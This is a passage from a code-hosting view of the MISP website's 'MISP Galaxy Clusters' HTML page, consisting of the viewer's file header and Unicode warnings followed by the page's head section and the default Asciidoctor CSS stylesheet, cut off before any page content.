misp-website/galaxy.html

100151 lines
5.1 MiB
Executable File
Raw Blame History

This file contains invisible Unicode characters!

This file contains invisible Unicode characters that may be processed differently from what appears below. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to reveal hidden characters.

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<!--[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]-->
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="Asciidoctor 1.5.6.1">
<title>MISP Galaxy Clusters</title>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300,300italic,400,400italic,600,600italic%7CNoto+Serif:400,400italic,700,700italic%7CDroid+Sans+Mono:400,700">
<style>
/* Asciidoctor default stylesheet | MIT License | http://asciidoctor.org */
/* Remove comment around @import statement below when using as a custom stylesheet */
/*@import "https://fonts.googleapis.com/css?family=Open+Sans:300,300italic,400,400italic,600,600italic%7CNoto+Serif:400,400italic,700,700italic%7CDroid+Sans+Mono:400,700";*/
article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}
audio,canvas,video{display:inline-block}
audio:not([controls]){display:none;height:0}
[hidden],template{display:none}
script{display:none!important}
html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}
a{background:transparent}
a:focus{outline:thin dotted}
a:active,a:hover{outline:0}
h1{font-size:2em;margin:.67em 0}
abbr[title]{border-bottom:1px dotted}
b,strong{font-weight:bold}
dfn{font-style:italic}
hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}
mark{background:#ff0;color:#000}
code,kbd,pre,samp{font-family:monospace;font-size:1em}
pre{white-space:pre-wrap}
q{quotes:"\201C" "\201D" "\2018" "\2019"}
small{font-size:80%}
sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}
sup{top:-.5em}
sub{bottom:-.25em}
img{border:0}
svg:not(:root){overflow:hidden}
figure{margin:0}
fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}
legend{border:0;padding:0}
button,input,select,textarea{font-family:inherit;font-size:100%;margin:0}
button,input{line-height:normal}
button,select{text-transform:none}
button,html input[type="button"],input[type="reset"],input[type="submit"]{-webkit-appearance:button;cursor:pointer}
button[disabled],html input[disabled]{cursor:default}
input[type="checkbox"],input[type="radio"]{box-sizing:border-box;padding:0}
input[type="search"]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}
input[type="search"]::-webkit-search-cancel-button,input[type="search"]::-webkit-search-decoration{-webkit-appearance:none}
button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}
textarea{overflow:auto;vertical-align:top}
table{border-collapse:collapse;border-spacing:0}
*,*:before,*:after{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}
html,body{font-size:100%}
body{background:#fff;color:rgba(0,0,0,.8);padding:0;margin:0;font-family:"Noto Serif","DejaVu Serif",serif;font-weight:400;font-style:normal;line-height:1;position:relative;cursor:auto;tab-size:4;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased}
a:hover{cursor:pointer}
img,object,embed{max-width:100%;height:auto}
object,embed{height:100%}
img{-ms-interpolation-mode:bicubic}
.left{float:left!important}
.right{float:right!important}
.text-left{text-align:left!important}
.text-right{text-align:right!important}
.text-center{text-align:center!important}
.text-justify{text-align:justify!important}
.hide{display:none}
img,object,svg{display:inline-block;vertical-align:middle}
textarea{height:auto;min-height:50px}
select{width:100%}
.center{margin-left:auto;margin-right:auto}
.spread{width:100%}
p.lead,.paragraph.lead>p,#preamble>.sectionbody>.paragraph:first-of-type p{font-size:1.21875em;line-height:1.6}
.subheader,.admonitionblock td.content>.title,.audioblock>.title,.exampleblock>.title,.imageblock>.title,.listingblock>.title,.literalblock>.title,.stemblock>.title,.openblock>.title,.paragraph>.title,.quoteblock>.title,table.tableblock>.title,.verseblock>.title,.videoblock>.title,.dlist>.title,.olist>.title,.ulist>.title,.qlist>.title,.hdlist>.title{line-height:1.45;color:#7a2518;font-weight:400;margin-top:0;margin-bottom:.25em}
div,dl,dt,dd,ul,ol,li,h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6,pre,form,p,blockquote,th,td{margin:0;padding:0;direction:ltr}
a{color:#2156a5;text-decoration:underline;line-height:inherit}
a:hover,a:focus{color:#1d4b8f}
a img{border:none}
p{font-family:inherit;font-weight:400;font-size:1em;line-height:1.6;margin-bottom:1.25em;text-rendering:optimizeLegibility}
p aside{font-size:.875em;line-height:1.35;font-style:italic}
h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6{font-family:"Open Sans","DejaVu Sans",sans-serif;font-weight:300;font-style:normal;color:#ba3925;text-rendering:optimizeLegibility;margin-top:1em;margin-bottom:.5em;line-height:1.0125em}
h1 small,h2 small,h3 small,#toctitle small,.sidebarblock>.content>.title small,h4 small,h5 small,h6 small{font-size:60%;color:#e99b8f;line-height:0}
h1{font-size:2.125em}
h2{font-size:1.6875em}
h3,#toctitle,.sidebarblock>.content>.title{font-size:1.375em}
h4,h5{font-size:1.125em}
h6{font-size:1em}
hr{border:solid #ddddd8;border-width:1px 0 0;clear:both;margin:1.25em 0 1.1875em;height:0}
em,i{font-style:italic;line-height:inherit}
strong,b{font-weight:bold;line-height:inherit}
small{font-size:60%;line-height:inherit}
code{font-family:"Droid Sans Mono","DejaVu Sans Mono",monospace;font-weight:400;color:rgba(0,0,0,.9)}
ul,ol,dl{font-size:1em;line-height:1.6;margin-bottom:1.25em;list-style-position:outside;font-family:inherit}
ul,ol{margin-left:1.5em}
ul li ul,ul li ol{margin-left:1.25em;margin-bottom:0;font-size:1em}
ul.square li ul,ul.circle li ul,ul.disc li ul{list-style:inherit}
ul.square{list-style-type:square}
ul.circle{list-style-type:circle}
ul.disc{list-style-type:disc}
ol li ul,ol li ol{margin-left:1.25em;margin-bottom:0}
dl dt{margin-bottom:.3125em;font-weight:bold}
dl dd{margin-bottom:1.25em}
abbr,acronym{text-transform:uppercase;font-size:90%;color:rgba(0,0,0,.8);border-bottom:1px dotted #ddd;cursor:help}
abbr{text-transform:none}
blockquote{margin:0 0 1.25em;padding:.5625em 1.25em 0 1.1875em;border-left:1px solid #ddd}
blockquote cite{display:block;font-size:.9375em;color:rgba(0,0,0,.6)}
blockquote cite:before{content:"\2014 \0020"}
blockquote cite a,blockquote cite a:visited{color:rgba(0,0,0,.6)}
blockquote,blockquote p{line-height:1.6;color:rgba(0,0,0,.85)}
@media only screen and (min-width:768px){h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6{line-height:1.2}
h1{font-size:2.75em}
h2{font-size:2.3125em}
h3,#toctitle,.sidebarblock>.content>.title{font-size:1.6875em}
h4{font-size:1.4375em}}
table{background:#fff;margin-bottom:1.25em;border:solid 1px #dedede}
table thead,table tfoot{background:#f7f8f7;font-weight:bold}
table thead tr th,table thead tr td,table tfoot tr th,table tfoot tr td{padding:.5em .625em .625em;font-size:inherit;color:rgba(0,0,0,.8);text-align:left}
table tr th,table tr td{padding:.5625em .625em;font-size:inherit;color:rgba(0,0,0,.8)}
table tr.even,table tr.alt,table tr:nth-of-type(even){background:#f8f8f7}
table thead tr th,table tfoot tr th,table tbody tr td,table tr td,table tfoot tr td{display:table-cell;line-height:1.6}
h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6{line-height:1.2;word-spacing:-.05em}
h1 strong,h2 strong,h3 strong,#toctitle strong,.sidebarblock>.content>.title strong,h4 strong,h5 strong,h6 strong{font-weight:400}
.clearfix:before,.clearfix:after,.float-group:before,.float-group:after{content:" ";display:table}
.clearfix:after,.float-group:after{clear:both}
*:not(pre)>code{font-size:.9375em;font-style:normal!important;letter-spacing:0;padding:.1em .5ex;word-spacing:-.15em;background-color:#f7f7f8;-webkit-border-radius:4px;border-radius:4px;line-height:1.45;text-rendering:optimizeSpeed;word-wrap:break-word}
*:not(pre)>code.nobreak{word-wrap:normal}
*:not(pre)>code.nowrap{white-space:nowrap}
pre,pre>code{line-height:1.45;color:rgba(0,0,0,.9);font-family:"Droid Sans Mono","DejaVu Sans Mono",monospace;font-weight:400;text-rendering:optimizeSpeed}
em em{font-style:normal}
strong strong{font-weight:400}
.keyseq{color:rgba(51,51,51,.8)}
kbd{font-family:"Droid Sans Mono","DejaVu Sans Mono",monospace;display:inline-block;color:rgba(0,0,0,.8);font-size:.65em;line-height:1.45;background-color:#f7f7f7;border:1px solid #ccc;-webkit-border-radius:3px;border-radius:3px;-webkit-box-shadow:0 1px 0 rgba(0,0,0,.2),0 0 0 .1em white inset;box-shadow:0 1px 0 rgba(0,0,0,.2),0 0 0 .1em #fff inset;margin:0 .15em;padding:.2em .5em;vertical-align:middle;position:relative;top:-.1em;white-space:nowrap}
.keyseq kbd:first-child{margin-left:0}
.keyseq kbd:last-child{margin-right:0}
.menuseq,.menuref{color:#000}
.menuseq b:not(.caret),.menuref{font-weight:inherit}
.menuseq{word-spacing:-.02em}
.menuseq b.caret{font-size:1.25em;line-height:.8}
.menuseq i.caret{font-weight:bold;text-align:center;width:.45em}
b.button:before,b.button:after{position:relative;top:-1px;font-weight:400}
b.button:before{content:"[";padding:0 3px 0 2px}
b.button:after{content:"]";padding:0 2px 0 3px}
p a>code:hover{color:rgba(0,0,0,.9)}
#header,#content,#footnotes,#footer{width:100%;margin-left:auto;margin-right:auto;margin-top:0;margin-bottom:0;max-width:62.5em;*zoom:1;position:relative;padding-left:.9375em;padding-right:.9375em}
#header:before,#header:after,#content:before,#content:after,#footnotes:before,#footnotes:after,#footer:before,#footer:after{content:" ";display:table}
#header:after,#content:after,#footnotes:after,#footer:after{clear:both}
#content{margin-top:1.25em}
#content:before{content:none}
#header>h1:first-child{color:rgba(0,0,0,.85);margin-top:2.25rem;margin-bottom:0}
#header>h1:first-child+#toc{margin-top:8px;border-top:1px solid #ddddd8}
#header>h1:only-child,body.toc2 #header>h1:nth-last-child(2){border-bottom:1px solid #ddddd8;padding-bottom:8px}
#header .details{border-bottom:1px solid #ddddd8;line-height:1.45;padding-top:.25em;padding-bottom:.25em;padding-left:.25em;color:rgba(0,0,0,.6);display:-ms-flexbox;display:-webkit-flex;display:flex;-ms-flex-flow:row wrap;-webkit-flex-flow:row wrap;flex-flow:row wrap}
#header .details span:first-child{margin-left:-.125em}
#header .details span.email a{color:rgba(0,0,0,.85)}
#header .details br{display:none}
#header .details br+span:before{content:"\00a0\2013\00a0"}
#header .details br+span.author:before{content:"\00a0\22c5\00a0";color:rgba(0,0,0,.85)}
#header .details br+span#revremark:before{content:"\00a0|\00a0"}
#header #revnumber{text-transform:capitalize}
#header #revnumber:after{content:"\00a0"}
#content>h1:first-child:not([class]){color:rgba(0,0,0,.85);border-bottom:1px solid #ddddd8;padding-bottom:8px;margin-top:0;padding-top:1rem;margin-bottom:1.25rem}
#toc{border-bottom:1px solid #efefed;padding-bottom:.5em}
#toc>ul{margin-left:.125em}
#toc ul.sectlevel0>li>a{font-style:italic}
#toc ul.sectlevel0 ul.sectlevel1{margin:.5em 0}
#toc ul{font-family:"Open Sans","DejaVu Sans",sans-serif;list-style-type:none}
#toc li{line-height:1.3334;margin-top:.3334em}
#toc a{text-decoration:none}
#toc a:active{text-decoration:underline}
#toctitle{color:#7a2518;font-size:1.2em}
@media only screen and (min-width:768px){#toctitle{font-size:1.375em}
body.toc2{padding-left:15em;padding-right:0}
#toc.toc2{margin-top:0!important;background-color:#f8f8f7;position:fixed;width:15em;left:0;top:0;border-right:1px solid #efefed;border-top-width:0!important;border-bottom-width:0!important;z-index:1000;padding:1.25em 1em;height:100%;overflow:auto}
#toc.toc2 #toctitle{margin-top:0;margin-bottom:.8rem;font-size:1.2em}
#toc.toc2>ul{font-size:.9em;margin-bottom:0}
#toc.toc2 ul ul{margin-left:0;padding-left:1em}
#toc.toc2 ul.sectlevel0 ul.sectlevel1{padding-left:0;margin-top:.5em;margin-bottom:.5em}
body.toc2.toc-right{padding-left:0;padding-right:15em}
body.toc2.toc-right #toc.toc2{border-right-width:0;border-left:1px solid #efefed;left:auto;right:0}}
@media only screen and (min-width:1280px){body.toc2{padding-left:20em;padding-right:0}
#toc.toc2{width:20em}
#toc.toc2 #toctitle{font-size:1.375em}
#toc.toc2>ul{font-size:.95em}
#toc.toc2 ul ul{padding-left:1.25em}
body.toc2.toc-right{padding-left:0;padding-right:20em}}
#content #toc{border-style:solid;border-width:1px;border-color:#e0e0dc;margin-bottom:1.25em;padding:1.25em;background:#f8f8f7;-webkit-border-radius:4px;border-radius:4px}
#content #toc>:first-child{margin-top:0}
#content #toc>:last-child{margin-bottom:0}
#footer{max-width:100%;background-color:rgba(0,0,0,.8);padding:1.25em}
#footer-text{color:rgba(255,255,255,.8);line-height:1.44}
.sect1{padding-bottom:.625em}
@media only screen and (min-width:768px){.sect1{padding-bottom:1.25em}}
.sect1+.sect1{border-top:1px solid #efefed}
#content h1>a.anchor,h2>a.anchor,h3>a.anchor,#toctitle>a.anchor,.sidebarblock>.content>.title>a.anchor,h4>a.anchor,h5>a.anchor,h6>a.anchor{position:absolute;z-index:1001;width:1.5ex;margin-left:-1.5ex;display:block;text-decoration:none!important;visibility:hidden;text-align:center;font-weight:400}
#content h1>a.anchor:before,h2>a.anchor:before,h3>a.anchor:before,#toctitle>a.anchor:before,.sidebarblock>.content>.title>a.anchor:before,h4>a.anchor:before,h5>a.anchor:before,h6>a.anchor:before{content:"\00A7";font-size:.85em;display:block;padding-top:.1em}
#content h1:hover>a.anchor,#content h1>a.anchor:hover,h2:hover>a.anchor,h2>a.anchor:hover,h3:hover>a.anchor,#toctitle:hover>a.anchor,.sidebarblock>.content>.title:hover>a.anchor,h3>a.anchor:hover,#toctitle>a.anchor:hover,.sidebarblock>.content>.title>a.anchor:hover,h4:hover>a.anchor,h4>a.anchor:hover,h5:hover>a.anchor,h5>a.anchor:hover,h6:hover>a.anchor,h6>a.anchor:hover{visibility:visible}
#content h1>a.link,h2>a.link,h3>a.link,#toctitle>a.link,.sidebarblock>.content>.title>a.link,h4>a.link,h5>a.link,h6>a.link{color:#ba3925;text-decoration:none}
#content h1>a.link:hover,h2>a.link:hover,h3>a.link:hover,#toctitle>a.link:hover,.sidebarblock>.content>.title>a.link:hover,h4>a.link:hover,h5>a.link:hover,h6>a.link:hover{color:#a53221}
.audioblock,.imageblock,.literalblock,.listingblock,.stemblock,.videoblock{margin-bottom:1.25em}
.admonitionblock td.content>.title,.audioblock>.title,.exampleblock>.title,.imageblock>.title,.listingblock>.title,.literalblock>.title,.stemblock>.title,.openblock>.title,.paragraph>.title,.quoteblock>.title,table.tableblock>.title,.verseblock>.title,.videoblock>.title,.dlist>.title,.olist>.title,.ulist>.title,.qlist>.title,.hdlist>.title{text-rendering:optimizeLegibility;text-align:left;font-family:"Noto Serif","DejaVu Serif",serif;font-size:1rem;font-style:italic}
table.tableblock>caption.title{white-space:nowrap;overflow:visible;max-width:0}
.paragraph.lead>p,#preamble>.sectionbody>.paragraph:first-of-type p{color:rgba(0,0,0,.85)}
table.tableblock #preamble>.sectionbody>.paragraph:first-of-type p{font-size:inherit}
.admonitionblock>table{border-collapse:separate;border:0;background:none;width:100%}
.admonitionblock>table td.icon{text-align:center;width:80px}
.admonitionblock>table td.icon img{max-width:initial}
.admonitionblock>table td.icon .title{font-weight:bold;font-family:"Open Sans","DejaVu Sans",sans-serif;text-transform:uppercase}
.admonitionblock>table td.content{padding-left:1.125em;padding-right:1.25em;border-left:1px solid #ddddd8;color:rgba(0,0,0,.6)}
.admonitionblock>table td.content>:last-child>:last-child{margin-bottom:0}
.exampleblock>.content{border-style:solid;border-width:1px;border-color:#e6e6e6;margin-bottom:1.25em;padding:1.25em;background:#fff;-webkit-border-radius:4px;border-radius:4px}
.exampleblock>.content>:first-child{margin-top:0}
.exampleblock>.content>:last-child{margin-bottom:0}
.sidebarblock{border-style:solid;border-width:1px;border-color:#e0e0dc;margin-bottom:1.25em;padding:1.25em;background:#f8f8f7;-webkit-border-radius:4px;border-radius:4px}
.sidebarblock>:first-child{margin-top:0}
.sidebarblock>:last-child{margin-bottom:0}
.sidebarblock>.content>.title{color:#7a2518;margin-top:0;text-align:center}
.exampleblock>.content>:last-child>:last-child,.exampleblock>.content .olist>ol>li:last-child>:last-child,.exampleblock>.content .ulist>ul>li:last-child>:last-child,.exampleblock>.content .qlist>ol>li:last-child>:last-child,.sidebarblock>.content>:last-child>:last-child,.sidebarblock>.content .olist>ol>li:last-child>:last-child,.sidebarblock>.content .ulist>ul>li:last-child>:last-child,.sidebarblock>.content .qlist>ol>li:last-child>:last-child{margin-bottom:0}
.literalblock pre,.listingblock pre:not(.highlight),.listingblock pre[class="highlight"],.listingblock pre[class^="highlight "],.listingblock pre.CodeRay,.listingblock pre.prettyprint{background:#f7f7f8}
.sidebarblock .literalblock pre,.sidebarblock .listingblock pre:not(.highlight),.sidebarblock .listingblock pre[class="highlight"],.sidebarblock .listingblock pre[class^="highlight "],.sidebarblock .listingblock pre.CodeRay,.sidebarblock .listingblock pre.prettyprint{background:#f2f1f1}
.literalblock pre,.literalblock pre[class],.listingblock pre,.listingblock pre[class]{-webkit-border-radius:4px;border-radius:4px;word-wrap:break-word;padding:1em;font-size:.8125em}
.literalblock pre.nowrap,.literalblock pre[class].nowrap,.listingblock pre.nowrap,.listingblock pre[class].nowrap{overflow-x:auto;white-space:pre;word-wrap:normal}
@media only screen and (min-width:768px){.literalblock pre,.literalblock pre[class],.listingblock pre,.listingblock pre[class]{font-size:.90625em}}
@media only screen and (min-width:1280px){.literalblock pre,.literalblock pre[class],.listingblock pre,.listingblock pre[class]{font-size:1em}}
.literalblock.output pre{color:#f7f7f8;background-color:rgba(0,0,0,.9)}
.listingblock pre.highlightjs{padding:0}
.listingblock pre.highlightjs>code{padding:1em;-webkit-border-radius:4px;border-radius:4px}
.listingblock pre.prettyprint{border-width:0}
.listingblock>.content{position:relative}
.listingblock code[data-lang]:before{display:none;content:attr(data-lang);position:absolute;font-size:.75em;top:.425rem;right:.5rem;line-height:1;text-transform:uppercase;color:#999}
.listingblock:hover code[data-lang]:before{display:block}
.listingblock.terminal pre .command:before{content:attr(data-prompt);padding-right:.5em;color:#999}
.listingblock.terminal pre .command:not([data-prompt]):before{content:"$"}
table.pyhltable{border-collapse:separate;border:0;margin-bottom:0;background:none}
table.pyhltable td{vertical-align:top;padding-top:0;padding-bottom:0;line-height:1.45}
table.pyhltable td.code{padding-left:.75em;padding-right:0}
pre.pygments .lineno,table.pyhltable td:not(.code){color:#999;padding-left:0;padding-right:.5em;border-right:1px solid #ddddd8}
pre.pygments .lineno{display:inline-block;margin-right:.25em}
table.pyhltable .linenodiv{background:none!important;padding-right:0!important}
.quoteblock{margin:0 1em 1.25em 1.5em;display:table}
.quoteblock>.title{margin-left:-1.5em;margin-bottom:.75em}
.quoteblock blockquote,.quoteblock blockquote p{color:rgba(0,0,0,.85);font-size:1.15rem;line-height:1.75;word-spacing:.1em;letter-spacing:0;font-style:italic;text-align:justify}
.quoteblock blockquote{margin:0;padding:0;border:0}
.quoteblock blockquote:before{content:"\201c";float:left;font-size:2.75em;font-weight:bold;line-height:.6em;margin-left:-.6em;color:#7a2518;text-shadow:0 1px 2px rgba(0,0,0,.1)}
.quoteblock blockquote>.paragraph:last-child p{margin-bottom:0}
.quoteblock .attribution{margin-top:.5em;margin-right:.5ex;text-align:right}
.quoteblock .quoteblock{margin-left:0;margin-right:0;padding:.5em 0;border-left:3px solid rgba(0,0,0,.6)}
.quoteblock .quoteblock blockquote{padding:0 0 0 .75em}
.quoteblock .quoteblock blockquote:before{display:none}
.verseblock{margin:0 1em 1.25em 1em}
.verseblock pre{font-family:"Open Sans","DejaVu Sans",sans;font-size:1.15rem;color:rgba(0,0,0,.85);font-weight:300;text-rendering:optimizeLegibility}
.verseblock pre strong{font-weight:400}
.verseblock .attribution{margin-top:1.25rem;margin-left:.5ex}
.quoteblock .attribution,.verseblock .attribution{font-size:.9375em;line-height:1.45;font-style:italic}
.quoteblock .attribution br,.verseblock .attribution br{display:none}
.quoteblock .attribution cite,.verseblock .attribution cite{display:block;letter-spacing:-.025em;color:rgba(0,0,0,.6)}
.quoteblock.abstract{margin:0 0 1.25em 0;display:block}
.quoteblock.abstract blockquote,.quoteblock.abstract blockquote p{text-align:left;word-spacing:0}
.quoteblock.abstract blockquote:before,.quoteblock.abstract blockquote p:first-of-type:before{display:none}
table.tableblock{max-width:100%;border-collapse:separate}
table.tableblock td>.paragraph:last-child p>p:last-child,table.tableblock th>p:last-child,table.tableblock td>p:last-child{margin-bottom:0}
table.tableblock,th.tableblock,td.tableblock{border:0 solid #dedede}
table.grid-all>thead>tr>.tableblock,table.grid-all>tbody>tr>.tableblock{border-width:0 1px 1px 0}
table.grid-all>tfoot>tr>.tableblock{border-width:1px 1px 0 0}
table.grid-cols>*>tr>.tableblock{border-width:0 1px 0 0}
table.grid-rows>thead>tr>.tableblock,table.grid-rows>tbody>tr>.tableblock{border-width:0 0 1px 0}
table.grid-rows>tfoot>tr>.tableblock{border-width:1px 0 0 0}
table.grid-all>*>tr>.tableblock:last-child,table.grid-cols>*>tr>.tableblock:last-child{border-right-width:0}
table.grid-all>tbody>tr:last-child>.tableblock,table.grid-all>thead:last-child>tr>.tableblock,table.grid-rows>tbody>tr:last-child>.tableblock,table.grid-rows>thead:last-child>tr>.tableblock{border-bottom-width:0}
table.frame-all{border-width:1px}
table.frame-sides{border-width:0 1px}
table.frame-topbot{border-width:1px 0}
th.halign-left,td.halign-left{text-align:left}
th.halign-right,td.halign-right{text-align:right}
th.halign-center,td.halign-center{text-align:center}
th.valign-top,td.valign-top{vertical-align:top}
th.valign-bottom,td.valign-bottom{vertical-align:bottom}
th.valign-middle,td.valign-middle{vertical-align:middle}
table thead th,table tfoot th{font-weight:bold}
tbody tr th{display:table-cell;line-height:1.6;background:#f7f8f7}
tbody tr th,tbody tr th p,tfoot tr th,tfoot tr th p{color:rgba(0,0,0,.8);font-weight:bold}
p.tableblock>code:only-child{background:none;padding:0}
p.tableblock{font-size:1em}
td>div.verse{white-space:pre}
ol{margin-left:1.75em}
ul li ol{margin-left:1.5em}
dl dd{margin-left:1.125em}
dl dd:last-child,dl dd:last-child>:last-child{margin-bottom:0}
ol>li p,ul>li p,ul dd,ol dd,.olist .olist,.ulist .ulist,.ulist .olist,.olist .ulist{margin-bottom:.625em}
ul.checklist,ul.none,ol.none,ul.no-bullet,ol.no-bullet,ol.unnumbered,ul.unstyled,ol.unstyled{list-style-type:none}
ul.no-bullet,ol.no-bullet,ol.unnumbered{margin-left:.625em}
ul.unstyled,ol.unstyled{margin-left:0}
ul.checklist{margin-left:.625em}
ul.checklist li>p:first-child>.fa-square-o:first-child,ul.checklist li>p:first-child>.fa-check-square-o:first-child{width:1.25em;font-size:.8em;position:relative;bottom:.125em}
ul.checklist li>p:first-child>input[type="checkbox"]:first-child{margin-right:.25em}
ul.inline{margin:0 auto .625em auto;margin-left:-1.375em;margin-right:0;padding:0;list-style:none;overflow:hidden}
ul.inline>li{list-style:none;float:left;margin-left:1.375em;display:block}
ul.inline>li>*{display:block}
.unstyled dl dt{font-weight:400;font-style:normal}
ol.arabic{list-style-type:decimal}
ol.decimal{list-style-type:decimal-leading-zero}
ol.loweralpha{list-style-type:lower-alpha}
ol.upperalpha{list-style-type:upper-alpha}
ol.lowerroman{list-style-type:lower-roman}
ol.upperroman{list-style-type:upper-roman}
ol.lowergreek{list-style-type:lower-greek}
.hdlist>table,.colist>table{border:0;background:none}
.hdlist>table>tbody>tr,.colist>table>tbody>tr{background:none}
td.hdlist1,td.hdlist2{vertical-align:top;padding:0 .625em}
td.hdlist1{font-weight:bold;padding-bottom:1.25em}
.literalblock+.colist,.listingblock+.colist{margin-top:-.5em}
.colist>table tr>td:first-of-type{padding:.4em .75em 0 .75em;line-height:1;vertical-align:top}
.colist>table tr>td:first-of-type img{max-width:initial}
.colist>table tr>td:last-of-type{padding:.25em 0}
.thumb,.th{line-height:0;display:inline-block;border:solid 4px #fff;-webkit-box-shadow:0 0 0 1px #ddd;box-shadow:0 0 0 1px #ddd}
.imageblock.left,.imageblock[style*="float: left"]{margin:.25em .625em 1.25em 0}
.imageblock.right,.imageblock[style*="float: right"]{margin:.25em 0 1.25em .625em}
.imageblock>.title{margin-bottom:0}
.imageblock.thumb,.imageblock.th{border-width:6px}
.imageblock.thumb>.title,.imageblock.th>.title{padding:0 .125em}
.image.left,.image.right{margin-top:.25em;margin-bottom:.25em;display:inline-block;line-height:0}
.image.left{margin-right:.625em}
.image.right{margin-left:.625em}
a.image{text-decoration:none;display:inline-block}
a.image object{pointer-events:none}
sup.footnote,sup.footnoteref{font-size:.875em;position:static;vertical-align:super}
sup.footnote a,sup.footnoteref a{text-decoration:none}
sup.footnote a:active,sup.footnoteref a:active{text-decoration:underline}
#footnotes{padding-top:.75em;padding-bottom:.75em;margin-bottom:.625em}
#footnotes hr{width:20%;min-width:6.25em;margin:-.25em 0 .75em 0;border-width:1px 0 0 0}
#footnotes .footnote{padding:0 .375em 0 .225em;line-height:1.3334;font-size:.875em;margin-left:1.2em;text-indent:-1.05em;margin-bottom:.2em}
#footnotes .footnote a:first-of-type{font-weight:bold;text-decoration:none}
#footnotes .footnote:last-of-type{margin-bottom:0}
#content #footnotes{margin-top:-.625em;margin-bottom:0;padding:.75em 0}
.gist .file-data>table{border:0;background:#fff;width:100%;margin-bottom:0}
.gist .file-data>table td.line-data{width:99%}
div.unbreakable{page-break-inside:avoid}
.big{font-size:larger}
.small{font-size:smaller}
.underline{text-decoration:underline}
.overline{text-decoration:overline}
.line-through{text-decoration:line-through}
.aqua{color:#00bfbf}
.aqua-background{background-color:#00fafa}
.black{color:#000}
.black-background{background-color:#000}
.blue{color:#0000bf}
.blue-background{background-color:#0000fa}
.fuchsia{color:#bf00bf}
.fuchsia-background{background-color:#fa00fa}
.gray{color:#606060}
.gray-background{background-color:#7d7d7d}
.green{color:#006000}
.green-background{background-color:#007d00}
.lime{color:#00bf00}
.lime-background{background-color:#00fa00}
.maroon{color:#600000}
.maroon-background{background-color:#7d0000}
.navy{color:#000060}
.navy-background{background-color:#00007d}
.olive{color:#606000}
.olive-background{background-color:#7d7d00}
.purple{color:#600060}
.purple-background{background-color:#7d007d}
.red{color:#bf0000}
.red-background{background-color:#fa0000}
.silver{color:#909090}
.silver-background{background-color:#bcbcbc}
.teal{color:#006060}
.teal-background{background-color:#007d7d}
.white{color:#bfbfbf}
.white-background{background-color:#fafafa}
.yellow{color:#bfbf00}
.yellow-background{background-color:#fafa00}
span.icon>.fa{cursor:default}
a span.icon>.fa{cursor:inherit}
.admonitionblock td.icon [class^="fa icon-"]{font-size:2.5em;text-shadow:1px 1px 2px rgba(0,0,0,.5);cursor:default}
.admonitionblock td.icon .icon-note:before{content:"\f05a";color:#19407c}
.admonitionblock td.icon .icon-tip:before{content:"\f0eb";text-shadow:1px 1px 2px rgba(155,155,0,.8);color:#111}
.admonitionblock td.icon .icon-warning:before{content:"\f071";color:#bf6900}
.admonitionblock td.icon .icon-caution:before{content:"\f06d";color:#bf3400}
.admonitionblock td.icon .icon-important:before{content:"\f06a";color:#bf0000}
.conum[data-value]{display:inline-block;color:#fff!important;background-color:rgba(0,0,0,.8);-webkit-border-radius:100px;border-radius:100px;text-align:center;font-size:.75em;width:1.67em;height:1.67em;line-height:1.67em;font-family:"Open Sans","DejaVu Sans",sans-serif;font-style:normal;font-weight:bold}
.conum[data-value] *{color:#fff!important}
.conum[data-value]+b{display:none}
.conum[data-value]:after{content:attr(data-value)}
pre .conum[data-value]{position:relative;top:-.125em}
b.conum *{color:inherit!important}
.conum:not([data-value]):empty{display:none}
dt,th.tableblock,td.content,div.footnote{text-rendering:optimizeLegibility}
h1,h2,p,td.content,span.alt{letter-spacing:-.01em}
p strong,td.content strong,div.footnote strong{letter-spacing:-.005em}
p,blockquote,dt,td.content,span.alt{font-size:1.0625rem}
p{margin-bottom:1.25rem}
.sidebarblock p,.sidebarblock dt,.sidebarblock td.content,p.tableblock{font-size:1em}
.exampleblock>.content{background-color:#fffef7;border-color:#e0e0dc;-webkit-box-shadow:0 1px 4px #e0e0dc;box-shadow:0 1px 4px #e0e0dc}
.print-only{display:none!important}
@media print{@page{margin:1.25cm .75cm}
*{-webkit-box-shadow:none!important;box-shadow:none!important;text-shadow:none!important}
a{color:inherit!important;text-decoration:underline!important}
a.bare,a[href^="#"],a[href^="mailto:"]{text-decoration:none!important}
a[href^="http:"]:not(.bare):after,a[href^="https:"]:not(.bare):after{content:"(" attr(href) ")";display:inline-block;font-size:.875em;padding-left:.25em}
abbr[title]:after{content:" (" attr(title) ")"}
pre,blockquote,tr,img,object,svg{page-break-inside:avoid}
thead{display:table-header-group}
svg{max-width:100%}
p,blockquote,dt,td.content{font-size:1em;orphans:3;widows:3}
h2,h3,#toctitle,.sidebarblock>.content>.title{page-break-after:avoid}
#toc,.sidebarblock,.exampleblock>.content{background:none!important}
#toc{border-bottom:1px solid #ddddd8!important;padding-bottom:0!important}
.sect1{padding-bottom:0!important}
.sect1+.sect1{border:0!important}
#header>h1:first-child{margin-top:1.25rem}
body.book #header{text-align:center}
body.book #header>h1:first-child{border:0!important;margin:2.5em 0 1em 0}
body.book #header .details{border:0!important;display:block;padding:0!important}
body.book #header .details span:first-child{margin-left:0!important}
body.book #header .details br{display:block}
body.book #header .details br+span:before{content:none!important}
body.book #toc{border:0!important;text-align:left!important;padding:0!important;margin:0!important}
